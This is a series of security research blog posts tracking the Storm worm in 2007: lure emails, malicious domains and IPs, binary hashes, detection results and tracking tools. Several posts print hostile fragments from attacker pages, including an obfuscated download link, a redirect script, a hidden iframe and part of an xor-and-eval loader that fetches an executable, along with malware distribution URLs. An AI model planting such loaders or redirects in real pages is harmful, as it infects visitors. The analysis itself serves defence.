CME711 Domains offline.

Steven Adair with Shadowserver is reporting that all the Stormworm domains have been marked NOT DELEGATED.

Randy V also performed some checks today and found the same thing. We're keeping a close eye on our honeypot to see if they change domains or if this is simply a smoke screen.

The authors were probably finished with the domains anyway, since its well passed the new year. The DISOG team is placing bets on the next rouse. I say adult rated material for February 14th (St. Valentines Day).

Domains that have been flagged and appear to be disabled:

i-halifax.com, i-barclays.com, newyearcards2008.com, happycards2008.com, uhavepostcard.com, merrychristmasdude.com, newyearwithlove.com, familypostcards2008.com, freshcards2008.com, hellosanta2008.com, happy2008toyou.com, happysantacards.com, hohoho2008.com, santawishes2008.com, santapcards.com, postcards-2008.com, parentscards.com

New Year, Recycled Greeting Cards

The storm authors have made up for their lack of creativity by registering a bunch of domains and quickly changing the filename. Additionally a false name has been added as a comment to the html source:

Your download should begin shortly. If your download does not start in
approximately 15 seconds,<br>
you can <!-- a href="fck2008.exe" !--><script language="javascript">
<!-- a href="fck2009.exe" -->
document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E'
) );

The javascript actually reads:

<a href="happynewyear2008.exe">

This was probably done in an attempt to identify automated scripts that parse the page for links, then crawl those links.

The following domains are still active (the other domains registered through ESTDOMAINS were suspended December 28th):

newyearcards2008.com
happycards2008.com
uhavepostcard.com
merrychristmasdude.com
newyearwithlove.com
familypostcards2008.com
freshcards2008.com
hellosanta2008.com
happy2008toyou.com
happysantacards.com
hohoho2008.com

serving the following files:

happynewyear2008.exe
happy_2008.exe
sony.exe

Bah, Storm.

I'd like to thank everyone who wrote in with the updates, CME711 is now using a Happy New Year theme. I would have posted earlier, but I promised the family a full day of Non-Digital happiness and it was truly a white Christmas.

Nothing sexy about this latest run, pretty crappy workmanship. It was an obvious after thought. It probably pissed off the botrunner that so many people were able to catch on to his Naughty Santa theme, so he produced a text only front page:

Happy New Year!

Your download should begin shortly. If your download does not start in approximately 15 seconds, you can (happy2008.exe) click here to launch the download and then press Run. Enjoy!

Hardly worth a post, except to exclaim how pathetic it looks. Certainly not the experience we've seen from these guys in exploits past. The domain was even registered December 23rd, such poor planning. Not an encoded javascript in sight. I wonder how much money these guys are paying their graphic designers. Certainly more than they're making. Even second rate script rats should think twice before getting in bed with these goons - they're too famous.

So, the domain? uhavepostcard.com. (also happycards2008.com)
Are the others still resolving? Yup.
Which binaries still work? stripshow.exe sony.exe happy2008.exe (update: happy-2008.exe)
Should the offenders be strung up by their toes and fed spoiled eggnog for 30 days? ;)

I sincerely hope that everyone else had a wonderful holiday, and for my New Years wish, I'd like a picture of the CME711 weenies drinking well expired eggnog. I'd also settle for another wonderful day with the family, as it was today.

The silent Storm and Javascript Decoding

Its been awhile since I've posted anything. I haven't lost touch, I've just been busy with the upcoming Holiday, and reserving myself for the next big Storm update.

A few of us were talking about Storm the other day, and Paul suggested that perhaps the authors have simply abandoned the current Storm botnet, in favor of laying low for a few months, and releasing a whole new version of the code, one with less bugs and some tactical modifications that might make it harder for security researchers to track them. I'm beginning to wonder if he's right. Storm has been silent since mid November. Is a New Year virus going to be born, something far more intrusive than Storm? Only time will tell. Thankfully we're getting a much needed break, so we can focus on other botnets.

---

There have been a good number of emails coming from users who wonder how we're able to decode some of the JavaScript seen on malware sites. The question usually comes after a reader has spotted a dangerous looking page, and we've confirmed it.

Daniel Wesemann has a great write up here. In fact Daniel sparked my interest in decoding malicious javascript instead of just running it through Rhino.

He and Jose Nazario with Arbor Networks have been great mentors. I thought I'd share something I put together using the skills taught by these two fellows.

I've built an automatic Javascript Decoder, which you can freely download and use. It is coded with an eye towards the unix flavor of OS, but should work fine if you have SpiderMonkey installed for windows, and don't mind modifying the code slightly. Jsdecode a public domain script that is simply a wrapper for Mozilla's SpiderMonkey application. Therefore, SpiderMonkey must be installed before this script will work.

Most of the malicious Javascript can be decoded by simply running it through this script. So far I've only had a handful of malicious javascripts requiring more advanced thought. The script isn't magic. It just creates a document.write function for you, and modifies eval statements so they print to the screen, and reruns the decoded javascript to make sure its just not double encoded. Other security researchers have written much better products, for example Malzilla from Boban Spasic.

This script just solves the "quick and dirty" requests I get on an almost daily basis. As is the case with any of my scripts, you're welcome to share them, modify them, even call them your own - but please give credit where credit is due, specifically to Jose and Daniel. If you use the script, or its techniques, consider dropping them a line and thanking them for helping educate the rest of us.

Happy Holidays,

Nicholas

jsdecode.pl.txt (rename to jsdecode.pl)

Stormworm using Geocities.

The Storm authors have updated their spam templates again. The spam links to several dozen Geocities pages.

Within the Geocities pages is some pretty poorly encoded Javascript. It decodes to:

<script type="text/javascript">
if (top.location != location) {
top.location.href = document.location.href ;
}
window.location = "http:// 58.65.238. 36/ aes/"
</script>

(Spaces added to prevent accidental clicks)

That site opened by the Javascript looks like this:


The links would have you download iPIX-install.exe (md5: d23355080a5c4705300a617c864df35c) which creates and runs the file %system32%\ntos.exe on each reboot.

Anubis is perhaps the best public sandbox system I've seen. Their report on this file can be found here.

CME711-Track Beta

Several people are interested in learning more about CME711 and generally how to track botnets. I fully respect and encourage that curiosity with one caveat - you will get attacked and storm may not be the best starter botnet.

If the bad guys are half as good as I suspect they are, they already know how I am downloading their binaries, and they don't care or there is nothing they can do about it. Furthermore, its easier to hide in plain sight, so I've made a decision to open some code up to everyone. It really isn't all that special and others are probably using similar code. For someone new to this fight, it may be the jump start you need. Good botnet monitoring skills are in high demand.

Originally we ran FakeSMTP (an email honeypot) and forced the Storm binaries to communicate with that SMTP server instead of using public relays. FakeSMTP would capture the body of the message, which had the download link. I had a script automatically parse and download the binaries, but that was slow and clunky. It also relied on my node being used as a spam proxy, which was happening less frequently.

Additionally that meant I had to run the binary. Running the binary is risky. For example, you could participate in denial of service attacks. Even with rate limiting, you still run the risk of doing harm. Its certainly not recommended for those who are new to the arena.

CME711-Track is a PERL script I hacked together for tracking the Peacomm/Storm/Peed/Nuwar trojans. Similar code has been used by DISOG since July 2007. While I modified the code slightly for public release, the general function is the same. The script is very simple, it contacts CME711's servers and tries to download a binary. If successful, it saves the file and adds a time-stamp to the log. Such logs can be used as blocklists, or to track infected hosts.

I overly commented the code on purpose. I had hoped those new to PERL and the world of botnet tracking would download it and learn how things work. Plain text readable comments and code encourage additional research.

There are zero license restrictions on this script. Anyone is welcome to run it, for as long as you wish. I hope you would consider mentioning DISOG in any research/postings; however if you don't, my feelings aren't likely to be hurt.

Script requirements: see "readme.txt" for more information. The code will not run if you don't follow the directions included in the readme. I did that on purpose - I believe if you can't read, you shouldn't be tracking botnets.

WARNING: This script will attempt to download live malware and no support is provided. You assume all risks associated with downloading malware, or pissing off the botnet operators. This includes denial of service attacks. I tried to comment the code as much as possible, and you're welcome to send questions via email. I will do my best to answer them in a timely manor.

http://www.disog.org/public/CME711-Track.zip
(MD5: ac85bf1b06be2653c6e647b839c5a9b9 ) (SHA1: b4c93d489693616a8150e607d4b7e98ca1b2ec61)

Be smart! This code should run on any operating system with a PERL interpreter, which includes Windows. How ever it will download real malware. The risk of accidentally running this code on a Windows machine is high. I don't recommend it. Run it on Linux, Mac, or a virtual windows machine. You'll be wasting a lot of time cleaning up your machine - not to mention looking like an idiot - if you don't follow this simple warning.

Detecting CME711 (Storm)

For those of you just joining us...

The trojan known as CME711 by Mitre, or Peacomm, Peed, Storm, and Nuwar, infects machines using social engineering. A user will receive an email with a half dozen or less lines of text. The email suggests the user will receive a greeting card, free game, or music sharing software. Other social engineering spams attributed to Storm have been placed on blogs and webpages.

More often than not, unsuspecting users will click the link provided in these emails or blogs. For those who are unlucky enough to have not applied patches to their operating system or third party software, the authors of this trojan have left a special treat - a javascript ripped from the Mpack suit.

When an unpatched user visits an Mpack infected site, they are infected with a host of malware. No user interaction is required for infection.

For those who have applied all patches, the authors have created a professional looking webpage that may spark your interest and have you clicking links. Either way, the end result is an infection, and your PC is turned into a zombie for the Storm botnet.

The botnet communicates using the same peer to peer technology as many file sharing applications like Gnutella and EDonkey. Since it uses this technology, it is hard to determine where botnet commands originate or how many zombies are a part of this botnet. Due to the peer to peer structure, locating the person controlling this network is very difficult. Worse still, the commands issued by the botnet controller are encrypted. The network uses DNS Double FastFlux to keep researchers from shutting the malware distribution points. Over 40,000 unique IP addresses have been seen by DISOG in the last 6 months serving malicious code for Storm. The Storm botnet is truly a global pest.

Many people have written in and asked for quick ways to detect if they are infected with Storm. This is difficult because Storm uses rootkit technology, to add to the misery, the code morphs every 30 to 60 seconds. This means you are unlikely to infect yourself with the same piece of code twice.

I've tested a few of the freely available rootkit detectors, and have come up with this pattern for tests:

Install rootkit detector -> run test -> reboot -> run test again.

Sophos rootkit detector and gmer both detected the hidden files after reboot, but neither detected on the first test.

Many people are reluctant to install another piece of software and I can understand why, so I decided to test the current version of Storm's file hiding technology. What I found is that you're able to determine if you've been infected by creating one file, and then trying to list that file using the dos directory (dir) command. You are also able to do this from the GUI, however the results are a little less obvious.

For this test, click start->run and type "cmd" (without quotes). A Command Prompt window will appear. Next you will want to create a file called spooldr.test. Do so by typing 'copy con spooldr.test'. Nothing will appear to happen, you will just be pushed to a blank line below your copy con command. Type something random and press enter. Then press the F6 key. You will see ^Z and '1 file(s) copied.' then you will be returned to your command prompt (C:\Documents and Settings\whatever\>) again. What you've just done is created a file with whatever text you typed on the blank line, just like if you created a new file in notepad and saved it.

Type 'dir spooldr.test'. If you're able to see the file with the current date and time, you're not infected with this version of Storm. If you can't list this file, you're probably infected, and need to seek professional help for removal.

It is trivial for the Storm authors to change their tactics and use another pattern for hiding their files. (SEE UPDATE BELOW!) I will try to keep on top of any changes and post them here - for now this should work on most systems. I could have written a program to do this for you and I am sure someone else will. However I believe in education, and you just can't learn anything if someone does all the work for you.

My first test was to run the most recent version of Storm as a normal, unprivileged user. The bot did make contact with the Storm network, however the rootkit function did not work, and I was able to see the spooldr.cfg file, which contains the current list of peers assigned to my computer. Upon reboot the software did not restart, so my machine did not participate with the botnet any longer. Running the code as administrator was when it became dangerous. Security experts have long recommended using a non-privlidged account for normal operations and only logging in as administrator when absolutely necessary. As if you needed another reason, right?

UPDATE:

McAfee is reporting the filenames have changed from spooldr.* to noskrnl.*. They also reminded us that wincom.* was used towards the beginning of the year. Its doubtful they changed the name based on this blogpost. More likely it was just good timing. I just grabbed a new binary and its still using spooldr.* - to be safe, try all three files.

MP3 Pump and Dumps -- UPDATED

Private security lists are buzzing about the latest Storm (CME711) Pump and Dumps are coming as MP3 audio attachments. Our mail drops have not received any of these yet, because our mail servers drop those attachments.

I've removed that restriction and hope to capture some samples soon. I've heard a sample and was barely able to understand the audio, though it is in English. I do not have permission to share that sample, so I will not be posting it here.

If you have a sample you'd like to share with the other readers, please send it as a zip attachment to security at disog dot org and let us know if we can attribute it to you.


Thanks for the submissions!

From an anonymous administrator

From Brent Eads

0.0.0.0 - UPDATED.

Once again, CME711's domain resolvers are all pointing to 0.0.0.0 - which suggests another change is upon us.

What will it be this time? Baseball? My home team has just swept the Diamond Backs, and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!

---

Update from Randy V:
They are back in full force. A nearly complete turn over of the active list from yesterday:

190.128.76.140 200.127.196.112 201.235.46.246 24.126.26.18 67.190.138.189 68.113.78.23 68.57.236.13 68.76.98.212 69.230.199.160 70.243.202.40 70.244.102.159 74.139.41.221 76.100.35.250 76.226.146.196 76.73.135.17 85.187.86.249 88.74.161.197

and the currently active list:

209.102.175.61 219.115.223.181 24.178.197.7 24.178.99.202 24.210.99.223 24.235.140.159 61.84.67.116 67.64.104.4 68.76.98.212 69.151.234.219 71.79.181.218 72.128.41.234 72.128.61.29 72.160.184.227 74.140.168.34 76.216.62.73 76.226.146.196 76.99.89.48 77.197.44.76 84.174.112.145 84.42.164.6 89.112.20.242 98.195.153.198 98.197.63.176

Only 201.235.46.246, 68.76.98.212 and 76.226.146.196 are in common. 76.226.146.196 is probably only a proxy.

Baseball does sound like a ripe target. There has not been a page change yet.

Update 2 (from Nicholas):
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 208.67.222.222 and 208.67.220.220. For more information visit the OpenDNS website.

Some more CME711/STORM IPs and other statistics

There have been a number of requests in mailing lists and privately for the latest Stormworm numbers. It seems people like statistics.

Since Oct 1st, 2007 we've identified 4,149 unique IP addresses participating with our honeypots, either p2p, in DDOS attacks, or spreading 'spa-m-alware' (mostly the later, since our smtp honeypot is setup to capture outgoing spam, and there is lots of it).

Additionally, our sensors have downloaded 7,202 Storm binaries, resulting in 4,661 uniquely hashed downloads since Oct 1st, 2007. A total of 43,897+ unique binaries have been captured to date.

The domains are slow to resolve again, some of them not responding at all. This is probably because the author is looking to spread the executable SuperLaugh.exe and working to change his sites. SuperLaugh will be spammed using the rouse 'a funny cat e-card.'

Lending an air of credibility to the scam SuperLaugh.com, which is a valid ecard site, also has a file called SuperLaugh.exe which is downloaded from http:// www.superlaugh.com/ icon/SuperLaugh.exe and has an MD5Sum of 571dd3cec20da6c70a3b62fa9f3637a8. Our anti-virus scanners say the legit file is harmless.

Malware Page:

Legit Page:

(The pages are both animations, the cat towards the front has a moving head, and both cats have cartoon balloons with scripted text)

In addition to the static html code, the authors are also attaching the Mpack xor'd javascript to the end of their pages. The javascript will attempt to exploit several old vulnerabilities within windows and third party software. It forces the download of file.php, a downloader.

It's still surprising to me how many ISP's are allowing these domains to resolve. The bad press coverage should be enough for the ISPs to start null routing those domains. We're still getting activity on the following domains:

ptowl.com tibeam.com kqfloat.com snbane.com yxbegan.com wxtaste.com eqcorn.com bnably.com ltbrew.com

We received an email from someone we suspect was trying to take over the Storm botnet. When we did not provide him with the requested information we believe he launched a JoeJob attack as described in the last blog entry.

We've seen researchers using TOR to capture binaries or communicate with the network, we see denial of service attacks on high profile IP's, probably related to researchers honeypots, and we suspect we've seen a few attempted take over attacks.

The authors don't appear to be letting up. The change in malware file names tells me they are getting greedy or preparing for something big.

As more black hats investigate the CME711 code, the network will become more vulnerable to takeover attacks. I hope these guys cut their losses and start breaking down the net soon. I would hate to see such a large botnet in the hands of some second rate script kiddy.

Stormworm - iframe hell.

This morning we started receiving dual language Storm worm Emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me



Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Смотри что о тебе пишут,ну ты и сука,смотрите все! вот адресс
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page doesn't yet resolve (404 error) however there is an index page and it has javascript iframes pointing to

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4

the sid=1 sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php

sid=4 is a javascript encoded page that trys to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is a javascript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php: is a lot of errors:

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an mpack that points to http:// superengine.cn /1278/file.php (binary file)

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fastflux --yet.

Space-sms, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting about 13:50 GMT Randy V noticed the domains started rotating the IP's less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL related (and nicely done) which is sharing NFLTracker.exe (NFLTracker.exe - Infected: Trojan.Peed.III). Its not using any of the xor'd javascript or browser exploits. This page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football related names - or that there will be mass infection of football related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'

CME711 (Storm) using TOR rouse

This morning I woke up to the latest storm page...

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">
<html>
<head>
<title>Tor: anonymity online</title>
</head>
<body>
<table border=0 width=\"500\">
<tr><td><img src=\"img/tor1.gif\"></td><td><h2>Tor: anonymity online</h2></td></tr>
<tr><td colspan=\"2\">
<br>
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
<br><br>
Tor aims to defend against traffic analysis, a form of network surveillance that threatens personal anonymity and privacy, confidential business activities and relationships, and state security. Communications are bounced around a distributed network of servers called onion routers, protecting you from websites that build profiles of your interests, local eavesdroppers that read your data or learn what sites you visit, and even the onion routers themselves.<br><br>
<a href=\"tor.exe\"><img src=\"img/tor2.png\" border=0></a>
</td></tr>
</table>
</body>
</html>

The text is a word for word cut and paste from the official TOR website, tor.eff.org.

In summary, they're wagering more clicks by offering The Onion Router (TOR) Proxy. Of course the binary is the standard CME711 trojan, nothing so fancy. At least they could have included TOR in the download!

The files file.php, sony.exe and tor.exe are resolving while video.exe, setup.exe and labor.exe no longer resolve.

UPDATE: TrendMicro has a nice writeup on this too: http://blog.trendmicro.com/nuwar-poses-as-tor-proxy/

Storm, meet Danchev - and SMTP Honeypots.

Dancho Danchev has been playing around with storm's fastflux and created some neat pictures showing how dynamic this network actually is.

His blog post is located here: http://ddanchev.blogspot.com/2007/09/storm-worms-fast-flux-networks.html

DISOG has been running internal SMTP honeypots for Stormworm since around August 15th. Since that date we've captured over 22,000 unique IP addresses!

Today was a slow day, 1651 unique IPs in just under 6000 emails. Since September 1st, we've managed to capture over 4685 unique IP addresses.

(Note, many IP's have been cleaned already, they are posted here for historical purposes only)

Latest Stormworm sharing Labor Day greetings

The CME-711 (Stormworm) peers are now spreading windows executable files with the following names:

file.php, video.exe, setup.exe, sony.exe and labor.exe

Sony.exe and labor.exe are new over the last 48 hours. Be sure to update your IDS Signatures.

Labor.exe is in reference to the Labor Day holiday:

Our Greeting System has a Labor Day card for you, go here to pick it up:

http:// yahoo.com /07cards/ greet1?[random hex string]

We're getting a new file on each download attempt again:

413801f06694ad17a7fa03508317fdac labor.exe
4f69c5550a497a02e0f690945925f398 labor.exe
024bf16416645df65358777b214d7997 labor.exe
2aa54149fcfc7ebaa960a8d5648d7dbb labor.exe
6cd2ed30fc3653f241b0702ef4c6f3c6 labor.exe
95b57c8cf2022317aafca06dae2d14be labor.exe
352cf8ef2bbca763d2d03e83fb86c9fd labor.exe
781e08a5dcc2c53646ed097e533d6659 labor.exe
accc4e975b8ab70b4286d113fe5e09dc labor.exe
7375b5c6614cf1a24713949a2ea9800a labor.exe
d43611911af1f7a2401faab91214c2bc labor.exe
cbe59b6688925857ab76301ce61919e5 labor.exe
0b9b061d368763ab51bf6d78f3c36086 labor.exe
651709024ebb9b830fdb9fca161348ae labor.exe

Our MD5 list has been updated, identifying the 26,200+ binaries we've captured. You can view it here.

Peacomm gets scrappy with Kaspersky

This was sent to us by a reader earlier this week:

<iframe src=\"http://kqfloat.com/ind.php\" alt=\"BYDLOSHKA\" height=\"1\" width=\"1\"></iframe>

I spent a few minutes looking at the code this evening...

Downloads xored javascript (like usual) ->

function xor_str(plain_str, xor_key){ var xored_str = \"\";
for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } function kaspersky(suck,dick){}; function
kaspersky2(suck_dick,again){};var plain_str =
....
....
SNIP
....
....
var xored_str = xor_str(plain_str, 200); eval(xored_str);

which downloads -> 'http:// fncarp.com /sony.exe' using the useragent:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)

Sony.exe appears to be static, just like video.exe and setup.exe (c05893a656b54164fb486028309bd89e)

Peed Goes Static

For the last few days, the Peed servers have stopped rotating their malware. They are sticking with the static MD5 sum of c05893a656b54164fb486028309bd89e.

Most of the major Antivirus vendors are aware of the file:

File setup.exe received on 09.01.2007 17:54:57 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.9.1.0	2007.09.01	Win32/Zhelatin.worm.138240.B
AntiVir	7.4.1.66	2007.08.31	Worm/Zhelatin.HJ
Authentium	4.93.8	2007.09.01	W32/Tibs.XB
Avast	4.7.1029.0	2007.09.01	Win32:Tibs-BCY
AVG	7.5.0.484	2007.08.31	Generic6.WTZ
BitDefender	7.2	2007.09.01	Trojan.Peed.PB
CAT-QuickHeal	9.00	2007.09.01	-
ClamAV	0.91.2	2007.09.01	-
DrWeb	4.33	2007.09.01	BackDoor.Groan
eSafe	7.0.15.0	2007.08.29	-
eTrust-Vet	31.1.5100	2007.08.31	Win32/Pecoan
Ewido	4.0	2007.09.01	-
FileAdvisor	1	2007.09.01	-
Fortinet	3.11.0.0	2007.09.01	W32/Tibs@mm
F-Prot	4.3.2.48	2007.08.31	W32/Tibs.XB
F-Secure	6.70.13030.0	2007.08.31	Email-Worm.Win32.Zhelatin.hj
Ikarus	T3.1.1.12	2007.09.01	Backdoor.Win32.Agent.amd
Kaspersky	4.0.2.24	2007.09.01	Email-Worm.Win32.Zhelatin.hj
McAfee	5110	2007.08.31	W32/Nuwar@MM
Microsoft	1.2803	2007.09.01	-
NOD32v2	2495	2007.09.01	-
Norman	5.80.02	2007.08.31	W32/Tibs.dam
Panda	9.0.0.4	2007.09.01	Trj/Alanchum.MV
Prevx1	V2	2007.09.01	-
Rising	19.38.52.00	2007.09.01	Worm.Mail.Win32.Zhelatin.dau
Sophos	4.21.0	2007.09.01	W32/Bagz-I
Sunbelt	2.2.907.0	2007.08.31	Trojan-Downloader.Win32.Tibs.jy
Symantec	10	2007.09.01	Trojan Horse
TheHacker	6.1.9.175	2007.08.31	W32/Zhelatin.hj
VBA32	3.12.2.3	2007.09.01	Email-Worm.Win32.Zhelatin.hj
VirusBuster	4.3.26:9	2007.09.01	I-Worm.Zhelatin.AA
Webwasher-Gateway	6.0.1	2007.08.31	Worm.Zhelatin.HJ
Additional information
File size: 138240 bytes
MD5: c05893a656b54164fb486028309bd89e
SHA1: 8ad506547710d61a6ac0613fdb1d290911f8e600

(Virustotal Results, http://www.virustotal.com)

As you can see, a select few still miss it, so please be careful clicking on those links in email or blog posts!


UPDATE: A closer look at our binaries over the last few days shows that we're still getting random binaries, but only a couple hundred a day, instead of several thousand. By far the most common binary appears to be c05893a656b54164fb486028309bd89e.

Targeted Storm

This morning I woke up to half a dozen targeted Storm Greetings in my mailbox. They looked like this:

Movie-quality postcard for (My Email Account Name)

Class mate(yexnjcegftuory@mittromney.com) has created Movie-quality postcard for you (My Email Account Name)
at lavacards.com.

To see your custom Movie-quality postcard, simply click on the following link:

http://xxx.xxx.xxx.xxx/

Send a FREE greeting card from lavacards.com whenever you want by visiting us at:
This service is provided and hosted by lavacards.com.

These are the first to include the account name used in the email. People may believe the authenticity of these emails because they do appear more targeted.

Dude, what if your wife finds this?!

The latest storm run is now using http and fake urls.

This is actually good news for us, because most spam filters will catch it. Turning off 'html display' in your email client will help you identify tricks like this:

Subject: Dude, what if your wife finds this?

From: <laura@trisection.com>Content-Type: text/html;charset=windows-1252
Content-Transfer-Encoding: 7BIT
Message-Id: <1IP0UT-000TG6-8G@wfvy>Sender: User guzjxoepu <guzjxoepu@wfvy>Date: Sun, 26 Aug 2007 03:36:09 +0900

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"><html><body>OMG, what are you doing man. This video of you is all over the net. take a look, lol... <a
href=\"http://xx.xx.x.xxx/\">http://www.youtube.com/watch?v=12xM6esvMXs</a></body></html>


The latest run uses video.exe and displays a static Youtube logo. All ecard.exe, msdataaccess.exe and applet.exe requests will result in a 404 error.

In other news:

We are now submitting our Stormworm IP feeds to Bleeding Edge Threats, and Comcast Communications as well as various private mailing lists and a law enforcement group.

We have captured over 25,000 unique malicious files related to this malware.

Other ISPs are starting to respond to our notifications.

US Cert has issued the following notice:

US-CERT is aware of several new propagation techniques being used by the Storm Worm Trojan to spread. The new variants arrive as either an email message claiming to contain a link to adult pictures, or as credentials for a membership-based website, asking you to login to change your temporary ID and password. The messages contain links to malicious websites that when visited, install malware on the user's system.

US-CERT urges users and administrators to take the following preventative measures to mitigate the security risks:

* Do not follow unsolicited links.
* Configure your web browser as described in the Securing Your Web Browser document.
* Install anti-virus software, and keep its virus signature files up-to-date.
* Refer to the Recognizing and Avoiding Email Scams document for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.

UPDATE: Sans ISC Post

Stormworm/Peed/Peacom changing templates (again...)

The storm authors must be putting in as much time changing their routine as I am monitoring them.

A few dozen versions of this were in my email box. Thankfully these aren't targeted..yet. That will give me time to update all those security awareness emails.

Welcome,

Here is your membership info for Online Gamers.

Membership Number: 76245793978563
Your Temp. Login ID: user1043
Temorary Password: pu345

Your temporary Login Info will expire in 24 hours. Please login and change it.

Use this link to change your Login info: http://66.107.xx.xxx/

Thank You,
Confirmation Dept.
Online Gamers

Quick Storm Update

We're seeing an increase in storm spam, one spam drop has received over 200 messages in the last 24 hours.

Most are targeted, and many look like they are trying to pass themselves off as casual messages, not just greeting cards.

All the storm infected systems we've visited recently are serving up the new Microsoft Data Access page. If you see this page please close your the browser immediately!

We've updated our stats, click on the links in previous posts for the updated lists of over 18000 unique MD5's, 11,000 unique IPs, 486 name servers, and 418 open resolvers.

The tushove.com domain has been suspended, but 12 others still remain.

Stormworm filename change.

We've seen a few reports of a new ecard, the latest:

Worshipper(funfrog@rehau.com) has created Funny ecard for you
at postcards.org.

To see your custom Funny ecard, simply click on the following link:

http://xx.xx0.60.111/

Send a FREE greeting card from postcards.org whenever you want by visiting us at:
This service is provided and hosted by postcards.org.

when visiting the url, you're greeted with:

To view your ecard, you need to have Microsoft Data Access installed on your computer.

Of course you can click and install "Microsoft Data Access", which is also named msdataaccess.exe. Its trojaned, and joins the storm network.

Storm/Peed email template change

The storm authors have slightly altered their egreeting template, the most recent looks like this:

Family member has created a postcard for you at postcards.com,
the Internet's most popular greeting card service.

Your greeting card ID is: (HEX STRING)

To see your custom greeting card, simply click on the link below:
http://xx.xx.xxx.xxx/?(HEX STRING FROM ABOVE)

Send greeting cards from postcards.com whenever you want by visiting us at:
http://postcards.com/
Copyright (c) 1996-2007 postcards.com All Rights Reserved

The postcard.com links are valid pointers.

Paul got this one over the weekend:

Neighbour(secretariaat.antwer ...@libertysurf.fr) has created Animated postcard for you
at yourgreeting.com.

To see your custom Animated postcard, simply click on the following
Internet address (if your mail program doesn't support this feature
you will need to COPY and PASTE the address into your browser's address box):

http://xxx.xxx.xxx.xxx/?089c03307ff04a3fcb36edbf088
Send a FREE greeting card from yourgreeting.com whenever you want by visiting us at:
http://yourgreeting.com/
This service is provided and hosted by yourgreeting.com.

Storm/Peed Nameserver Update

DISOG researcher Randy Vaughn has identified a new wrinkle with the Stormworm Nameservers. 364 of the identified nameservers are now functioning as open resolvers.

